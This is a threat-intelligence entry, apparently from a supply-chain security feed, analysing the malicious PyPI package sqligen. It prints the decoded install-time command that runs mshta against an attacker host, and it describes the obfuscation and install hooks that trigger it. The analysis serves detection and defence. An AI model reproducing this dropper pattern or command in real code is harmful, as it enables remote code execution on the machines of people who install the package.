Supply-chain threat intelligence
Risk score
92
Indexed incident for sqligen (pypi).
setup.py contains an obfuscated install-time dropper that fires on Windows. Two functions with diagnostic-sounding names ('GetDefaultSystemPolicy' / 'CalculateNodeDrift', backed by integer arrays presented as 'InterruptThresholds' and 'ThreadPingLatencies') decode via chr(value+14) arithmetic to the strings 'mshta' and 'https://fixars.top'. On Windows, GetGitCommitHash() runs subprocess.check_output(['mshta', 'https://fixars.top'], shell=True), executing an arbitrary remote HTA payload from fixars.top. This codepath is reached from CustomInstallCommand, CustomBuildPyCommand, and CustomDevelopCommand, so any pip install sqligen (or pip install -e.) on a Windows host triggers remote code execution under the installing user's account. The obfuscation (cover-story variable names, chr-shift encoding of the command and URL) demonstrates intentional evasion of source review; legitimate build tooling does not encode 'mshta' as 'hardware interrupt latency thresholds'. The fetched payload is attacker-controlled and unrelated to the package's stated SQL-generation purpose.
During installation, the code attempts to download and start a malicious executable.
Likely related to 2025-08-raknet-testing-package.
Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.
Campaign: 2026-06-easyaillm
Reasons (based on the campaign):
Downloads and executes a remote executable.
obfuscation
malware
tool:mshta
Affected versions
Indicators
Timeline